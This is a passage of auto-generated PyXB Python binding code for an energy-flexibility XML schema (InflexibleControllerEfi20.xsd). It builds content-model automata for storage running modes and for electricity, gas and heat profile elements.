def _BuildAutomaton_50 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_50
del _BuildAutomaton_50
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 293, 3))
counters.add(cc_0)
cc_1 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 297, 3))
counters.add(cc_1)
cc_2 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 301, 3))
counters.add(cc_2)
states = []
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(SequentialProfileAlternative._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'electricityProfile')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 294, 4))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(SequentialProfileAlternative._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'electricityProbabilityProfile')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 295, 4))
st_1 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_1, False))
symbol = pyxb.binding.content.ElementUse(SequentialProfileAlternative._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'gasProfile')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 298, 4))
st_2 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_2)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_1, False))
symbol = pyxb.binding.content.ElementUse(SequentialProfileAlternative._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'gasProbabilityProfile')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 299, 4))
st_3 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_3)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_2, False))
symbol = pyxb.binding.content.ElementUse(SequentialProfileAlternative._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'heatProfile')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 302, 4))
st_4 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_4)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_2, False))
symbol = pyxb.binding.content.ElementUse(SequentialProfileAlternative._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'heatProbabilityProfile')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 303, 4))
st_5 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_5)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_0, False) ]))
st_0._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_0, False) ]))
st_1._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_1, True) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_1, True) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_1, False) ]))
st_2._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_1, True) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_1, True) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_1, False) ]))
st_3._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_2, True) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_2, True) ]))
st_4._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_2, True) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_2, True) ]))
st_5._set_transitionSet(transitions)
return fac.Automaton(states, counters, True, containing_state=None)
SequentialProfileAlternative._Automaton = _BuildAutomaton_50()
StorageDiscreteRunningMode._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'discreteRunningModeElement'), CTD_ANON_16, scope=StorageDiscreteRunningMode, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 585, 5)))
def _BuildAutomaton_51 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_51
del _BuildAutomaton_51
import pyxb.utils.fac as fac
counters = set()
states = []
final_update = set()
symbol = pyxb.binding.content.ElementUse(StorageDiscreteRunningMode._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'discreteRunningModeElement')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 585, 5))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
transitions = []
transitions.append(fac.Transition(st_0, [
]))
st_0._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
StorageDiscreteRunningMode._Automaton = _BuildAutomaton_51()
CTD_ANON_16._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'fillingRate'), pyxb.binding.datatypes.double, scope=CTD_ANON_16, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 590, 10)))
CTD_ANON_16._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'runningCost'), pyxb.binding.datatypes.decimal, scope=CTD_ANON_16, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 591, 10)))
CTD_ANON_16._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'electricalPower'), pyxb.binding.datatypes.double, scope=CTD_ANON_16, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 592, 10)))
CTD_ANON_16._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'gasFlowRate'), pyxb.binding.datatypes.double, scope=CTD_ANON_16, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 593, 10)))
CTD_ANON_16._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'heatTemperature'), pyxb.binding.datatypes.double, scope=CTD_ANON_16, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 594, 10)))
CTD_ANON_16._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'heatFlowRate'), pyxb.binding.datatypes.double, scope=CTD_ANON_16, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 595, 10)))
CTD_ANON_16._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'heatThermalPower'), pyxb.binding.datatypes.double, scope=CTD_ANON_16, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 596, 10)))
def _BuildAutomaton_52 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_52
del _BuildAutomaton_52
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 591, 10))
counters.add(cc_0)
cc_1 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 592, 10))
counters.add(cc_1)
cc_2 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 593, 10))
counters.add(cc_2)
cc_3 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 594, 10))
counters.add(cc_3)
cc_4 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 595, 10))
counters.add(cc_4)
cc_5 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 596, 10))
counters.add(cc_5)
states = []
final_update = set()
symbol = pyxb.binding.content.ElementUse(CTD_ANON_16._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'fillingRate')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 590, 10))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_16._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'runningCost')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 591, 10))
st_1 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_1, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_16._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'electricalPower')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 592, 10))
st_2 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_2)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_2, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_16._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'gasFlowRate')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 593, 10))
st_3 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_3)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_3, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_16._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'heatTemperature')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 594, 10))
st_4 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_4)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_4, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_16._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'heatFlowRate')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 595, 10))
st_5 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_5)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_5, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_16._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'heatThermalPower')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 596, 10))
st_6 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_6)
transitions = []
transitions.append(fac.Transition(st_1, [
]))
transitions.append(fac.Transition(st_2, [
]))
transitions.append(fac.Transition(st_3, [
]))
transitions.append(fac.Transition(st_4, [
]))
transitions.append(fac.Transition(st_5, [
]))
transitions.append(fac.Transition(st_6, [
]))
st_0._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_6, [
fac.UpdateInstruction(cc_0, False) ]))
st_1._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_1, True) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_6, [
fac.UpdateInstruction(cc_1, False) ]))
st_2._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_2, True) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_6, [
fac.UpdateInstruction(cc_2, False) ]))
st_3._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_3, True) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_3, False) ]))
transitions.append(fac.Transition(st_6, [
fac.UpdateInstruction(cc_3, False) ]))
st_4._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_4, True) ]))
transitions.append(fac.Transition(st_6, [
fac.UpdateInstruction(cc_4, False) ]))
st_5._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_6, [
fac.UpdateInstruction(cc_5, True) ]))
st_6._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
CTD_ANON_16._Automaton = _BuildAutomaton_52()
StorageContinuousRunningMode._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'continuousRunningModeElement'), CTD_ANON_17, scope=StorageContinuousRunningMode, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 621, 5)))
def _BuildAutomaton_53 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_53
del _BuildAutomaton_53
import pyxb.utils.fac as fac
counters = set()
states = []
final_update = set()
symbol = pyxb.binding.content.ElementUse(StorageContinuousRunningMode._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'continuousRunningModeElement')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 621, 5))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
transitions = []
transitions.append(fac.Transition(st_0, [
]))
st_0._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
StorageContinuousRunningMode._Automaton = _BuildAutomaton_53()
CTD_ANON_17._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'lowerBound'), CTD_ANON_18, scope=CTD_ANON_17, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 626, 10)))
CTD_ANON_17._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'upperBound'), CTD_ANON_19, scope=CTD_ANON_17, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 633, 10)))
def _BuildAutomaton_54 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_54
del _BuildAutomaton_54
import pyxb.utils.fac as fac
counters = set()
states = []
final_update = None
symbol = pyxb.binding.content.ElementUse(CTD_ANON_17._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'lowerBound')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 626, 10))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = set()
symbol = pyxb.binding.content.ElementUse(CTD_ANON_17._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'upperBound')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 633, 10))
st_1 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
transitions = []
transitions.append(fac.Transition(st_1, [
]))
st_0._set_transitionSet(transitions)
transitions = []
st_1._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
CTD_ANON_17._Automaton = _BuildAutomaton_54()
def _BuildAutomaton_55 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_55
del _BuildAutomaton_55
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 609, 3))
counters.add(cc_0)
cc_1 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 610, 3))
counters.add(cc_1)
cc_2 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 611, 3))
counters.add(cc_2)
cc_3 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 612, 3))
counters.add(cc_3)
cc_4 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 613, 3))
counters.add(cc_4)
cc_5 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 614, 3))
counters.add(cc_5)
states = []
final_update = set()
symbol = pyxb.binding.content.ElementUse(CTD_ANON_18._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'fillingRate')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 608, 3))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_18._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'runningCost')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 609, 3))
st_1 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_1, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_18._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'electricalPower')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 610, 3))
st_2 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_2)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_2, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_18._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'gasFlowRate')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 611, 3))
st_3 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_3)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_3, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_18._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'heatTemperature')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 612, 3))
st_4 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_4)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_4, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_18._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'heatFlowRate')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 613, 3))
st_5 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_5)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_5, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_18._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'heatThermalPower')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 614, 3))
st_6 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_6)
transitions = []
transitions.append(fac.Transition(st_1, [
]))
transitions.append(fac.Transition(st_2, [
]))
transitions.append(fac.Transition(st_3, [
]))
transitions.append(fac.Transition(st_4, [
]))
transitions.append(fac.Transition(st_5, [
]))
transitions.append(fac.Transition(st_6, [
]))
st_0._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_6, [
fac.UpdateInstruction(cc_0, False) ]))
st_1._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_1, True) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_6, [
fac.UpdateInstruction(cc_1, False) ]))
st_2._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_2, True) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_6, [
fac.UpdateInstruction(cc_2, False) ]))
st_3._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_3, True) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_3, False) ]))
transitions.append(fac.Transition(st_6, [
fac.UpdateInstruction(cc_3, False) ]))
st_4._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_4, True) ]))
transitions.append(fac.Transition(st_6, [
fac.UpdateInstruction(cc_4, False) ]))
st_5._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_6, [
fac.UpdateInstruction(cc_5, True) ]))
st_6._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
CTD_ANON_18._Automaton = _BuildAutomaton_55()
def _BuildAutomaton_56 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_56
del _BuildAutomaton_56
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 609, 3))
counters.add(cc_0)
cc_1 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 610, 3))
counters.add(cc_1)
cc_2 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 611, 3))
counters.add(cc_2)
cc_3 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 612, 3))
counters.add(cc_3)
cc_4 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 613, 3))
counters.add(cc_4)
cc_5 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 614, 3))
counters.add(cc_5)
states = []
final_update = set()
symbol = pyxb.binding.content.ElementUse(CTD_ANON_19._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'fillingRate')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 608, 3))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_19._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'runningCost')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 609, 3))
st_1 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_1, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_19._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'electricalPower')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 610, 3))
st_2 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_2)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_2, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_19._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'gasFlowRate')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 611, 3))
st_3 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_3)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_3, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_19._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'heatTemperature')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 612, 3))
st_4 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_4)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_4, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_19._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'heatFlowRate')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 613, 3))
st_5 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_5)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_5, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_19._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'heatThermalPower')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 614, 3))
st_6 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_6)
transitions = []
transitions.append(fac.Transition(st_1, [
]))
transitions.append(fac.Transition(st_2, [
]))
transitions.append(fac.Transition(st_3, [
]))
transitions.append(fac.Transition(st_4, [
]))
transitions.append(fac.Transition(st_5, [
]))
transitions.append(fac.Transition(st_6, [
]))
st_0._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_6, [
fac.UpdateInstruction(cc_0, False) ]))
st_1._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_1, True) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_1, False) ]))
